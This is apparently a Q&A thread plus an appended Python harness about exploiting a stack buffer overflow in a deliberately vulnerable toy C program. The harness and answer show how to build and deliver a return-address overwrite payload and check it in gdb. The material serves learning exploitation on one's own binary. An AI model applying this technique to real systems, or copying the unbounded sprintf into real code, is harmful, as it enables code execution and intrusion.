
Following this: How can I exploit a buffer overflow?

I have this code, compiled using -fno-stack-protector:

#include <stdio.h>

/* The function the overflow is meant to redirect execution to. */
void shellcode(){
    printf("\n Reached shellcode!");
}

int main(int argc, char **argv){
    char buf[3];                 /* 3-byte stack buffer */
    sprintf(buf, "%s", argv[1]); /* unbounded copy (deliberately vulnerable):
                                    overflows buf as soon as argv[1] is longer
                                    than 2 characters; argc is never checked */
    return 0;
}

but I am unable to execute the shellcode function.

Like in that post, I am using:

python -c 'print "A"*27+"\x49\x11\x00\x00\x00\x00\x00\x00"' > input
./a < input

I get a segfault with:

./a 12345678901
Segmentation fault (core dumped)

but nothing happens.

My main goal is to execute ls on Linux instead of the shellcode function, but right now nothing works.

code0x00

1 Answer


There are two potential problems here:

  1. By using sprintf(.., argv[1]), you seem to be expecting input from argv, but ./a < input directs the file to STDIN.

  2. ASLR could screw your exploit up, meaning that you don't know if the address is correct.

It's very difficult to answer such questions without having the binary (a) itself, or at least the Makefile.

If I were you, I would work with a debugger (GDB is great) until the exploit works. But it's worth noting that with ASLR, it would be tough.

malkaroee
  • (Tangentially, saving a temporary input in a file is a very un-Unixy thing to do; use a pipe or a command substitution.) – tripleee May 17 '22 at 09:21
  • @malkaroee Just starting to learn about sec, could you please tell me what I should look at in particular in gdb? – code0x00 May 20 '22 at 17:12
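The two points in the answer (the payload has to arrive in argv[1], not on stdin, and the return address has to be the address the binary actually runs at) can be turned into a small harness. The following is an added example, not code from the question or the answer. It assumes the program was built on x86-64 Linux as a non-PIE binary (gcc -fno-stack-protector -no-pie -o a a.c), so that nm prints the final address of shellcode rather than a PIE offset, and that it is run with ASLR disabled for the process (setarch $(uname -m) -R ./a ...). The padding of 27 bytes is the value from the question and is taken on trust; the nm output embedded in the file is constructed, and its addresses are invented. For reference, when the program is run as ./a < input, argv[1] is NULL and glibc formats a NULL %s argument as "(null)", which is far too short to reach the saved return address, so no crash is expected in that case.

```python
import struct
import subprocess
import sys

# Distance from the start of buf to the saved return address. The question
# uses 27; it is taken on trust here and must be confirmed in gdb.
PADDING = 27

# Constructed stand-in for `nm ./a` output on a non-PIE build; the addresses
# are made up for this example.
SAMPLE_NM = """\
0000000000401050 T _start
0000000000401136 T shellcode
0000000000401149 T main
"""


def symbol_address(nm_output, name):
    """Return the address nm reports for `name`.

    For a binary built with -no-pie this is the address the CPU will jump to.
    For a PIE binary nm prints only the offset within the image, which is why
    a value like 0x1149 never works as a return address once the loader (with
    ASLR) maps the image somewhere else.
    """
    for line in nm_output.splitlines():
        fields = line.split()
        if len(fields) == 3 and fields[2] == name:
            return int(fields[0], 16)
    raise KeyError("symbol not found: %s" % name)


def payload(padding, target):
    """Filler up to the saved return address, then the target address as a
    little-endian 64-bit value (x86-64)."""
    return b"A" * padding + struct.pack("<Q", target)


def argv_payload(raw):
    """Make the payload deliverable through argv[1].

    execve passes each argv entry as a NUL-terminated C string and sprintf's
    %s copies up to the first NUL, so an interior NUL would cut the copy
    short. Trailing NULs (the high bytes of a small address) are dropped;
    sprintf writes one terminator of its own.
    """
    trimmed = raw.rstrip(b"\x00")
    if b"\x00" in trimmed:
        raise ValueError("payload has an interior NUL; the copy would stop there")
    return trimmed


def bytes_written(arg):
    """Bytes that sprintf(buf, "%s", arg) stores in buf, terminator included."""
    return len(arg) + 1


def run_with_argv(binary, arg):
    """Hand the payload to the program as argv[1] instead of stdin.

    Returns (exit status, stdout). A status of -11 is SIGSEGV, i.e. the
    overwritten return address was not a usable code address.
    """
    proc = subprocess.run([binary, arg], capture_output=True)
    return proc.returncode, proc.stdout


if __name__ == "__main__":
    if len(sys.argv) > 1:
        binary = sys.argv[1]
        nm_out = subprocess.run(["nm", binary], capture_output=True, text=True).stdout
        target = symbol_address(nm_out, "shellcode")
    else:
        target = symbol_address(SAMPLE_NM, "shellcode")
    arg = argv_payload(payload(PADDING, target))
    print("target 0x%x, argv[1] = %s (%d bytes written by sprintf)"
          % (target, arg.hex(), bytes_written(arg)))
    if len(sys.argv) > 1:
        status, out = run_with_argv(sys.argv[1], arg)
        print("exit status %d, stdout %r" % (status, out))
```

Run it as python3 harness.py ./a to take the address from the real binary, or with no argument to see the payload built from the constructed nm output. Two things to check in gdb before trusting the result: p shellcode prints the address the running process actually uses (compare it with nm), and a breakpoint on the ret instruction at the end of main (disassemble main shows its address) followed by x/gx $rsp shows the 8 bytes that ret will pop. Because sprintf stops at the terminator, an argument of 27 filler bytes plus a 3-byte address replaces only the low 4 bytes of the saved return address; whether that is enough depends on what the upper 4 bytes already contain, which is exactly what that x/gx shows.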